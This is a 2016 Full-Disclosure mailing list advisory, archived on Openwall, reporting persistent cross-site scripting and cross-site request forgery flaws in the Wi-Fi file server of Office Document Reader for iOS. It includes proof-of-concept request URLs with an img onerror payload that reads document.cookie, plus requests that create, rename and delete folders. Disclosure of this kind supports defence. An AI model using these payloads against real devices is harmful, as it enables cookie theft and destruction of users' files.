lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 3 Jan 2016 01:44:39 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] Vulnerabilities in Office Document Reader for iOS

Hello list!

Happy New Year!

There are multiple vulnerabilities in Office Document Reader for iOS. There 
are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities. 
Earlier I've informed developer of Office Document Reader about this and 
other his software.

-------------------------
Affected products:
-------------------------

Vulnerable are Office Document Reader 5.1.13 for iOS and previous versions. 
Vulnerable as paid, as free version (at the beginning the paid function 
works of access via Wi-Fi, which turns on http and ftp server).

-------------------------
Affected vendor:
-------------------------

LTD DevelSoftware.

----------
Details:
----------

Cross-Site Scripting (WASC-08) (Persistent XSS):

http://192.168.0.28/createdir?path=%3Cimg%20src=%271%27%20onerror=%27alert(document.cookie)%27%3E

http://192.168.0.28/rename?path=%2FFolder&newpath=%271%27%20onerror=%27alert(document.cookie)%27%3E

Cross-Site Scripting (WASC-08) (Persistent XSS):

Through FTP it's possible to set name of folder or file with XSS code. The 
access to http and ftp servers via local networks is not limited (without 
password). Therefore via uploading it's possible in particular to conduct 
XSS attack.

Cross-Site Request Forgery (WASC-09):

The whole functionality is vulnerable to CSRF attacks: creation, renaming 
and deleting of a folder.

http://192.168.0.28/createdir?path=%2FFolder

http://192.168.0.28/rename?path=%2FFolder&newpath=%2FFolder2

http://192.168.0.28/delete?path=%2FFolder

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/8092/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists